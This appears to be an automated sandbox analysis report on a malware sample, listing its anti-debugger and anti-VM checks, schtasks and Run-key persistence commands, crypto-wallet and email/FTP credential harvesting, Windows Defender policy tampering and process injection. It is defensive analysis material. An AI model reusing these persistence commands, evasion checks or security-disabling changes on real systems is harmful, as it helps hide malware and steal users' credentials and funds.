FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: 18467-41 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: 18467-41 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: Regmonclass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: Regmonclass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: 18467-41 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: Filemonclass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: Filemonclass window_name:		0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (8 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Windows\Tasks\explorgu.job
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000458 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000458 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Feb. 19, 2024, 7:50 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Network activity contains more than one unique useragent (2 events)

process	reals.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2988 resumed a thread in remote process 3064
NtResumeThread Feb. 19, 2024, 7:50 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 3064	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Detects VirtualBox through the presence of a device (1 event)

file	\??\VBoxGuest

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 19, 2024, 7:50 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 68 3d b2 fb 33 e9 84 11 exception.symbol: chxwqlmwumgbbwn9hxfj+0x1ebdd0 exception.instruction: in eax, dx exception.module: cHXwqlMWUMGBBwN9hxfj.exe exception.exception_code: 0xc0000096 exception.offset: 2014672 exception.address: 0xebbdd0 registers.esp: 2030272 registers.edi: 2699040 registers.eax: 1447909480 registers.ebp: 4003889172 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 15447615 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

reals.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All